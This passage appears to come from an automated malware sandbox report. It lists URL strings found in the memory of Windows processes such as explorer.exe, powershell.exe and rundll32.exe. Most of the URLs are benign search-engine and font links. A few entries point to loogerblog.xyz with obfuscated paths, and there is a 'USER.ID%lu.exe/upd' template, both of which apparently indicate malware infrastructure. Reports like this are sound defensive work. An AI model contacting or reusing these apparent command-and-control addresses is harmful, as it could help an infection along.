            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: powershell.exe, 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, control.exe, 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, rundll32.exe, 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.499102380.0000000008455000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/NIcuL5NVjxwM/2GiryhKI5_2/FNJaA9fYIAvcIp/w_2B_2BISN4Xz1NACkLBL/pkU7CWqAn
            Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnf
            Source: explorer.exe, 0000001E.00000002.704498511.00000000045BE000.00000004.00000001.sdmpString found in binary or memory: http://loogerblog.xyz/images/heS41tWM4/dTuObjanXSKYXyb0FkTo/Sul08DWWYjtvEXiZbeu/IttDYgTEILEomnfMBe_2
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: powershell.exe, 00000017.00000002.545875762.0000028A10065000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: powershell.exe, 00000017.00000002.521630583.0000028A00001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001E.00000000.496563368.00000000075A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000017.00000002.522033208.0000028A0020E000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.502226332.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.497432491.0000000007693000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
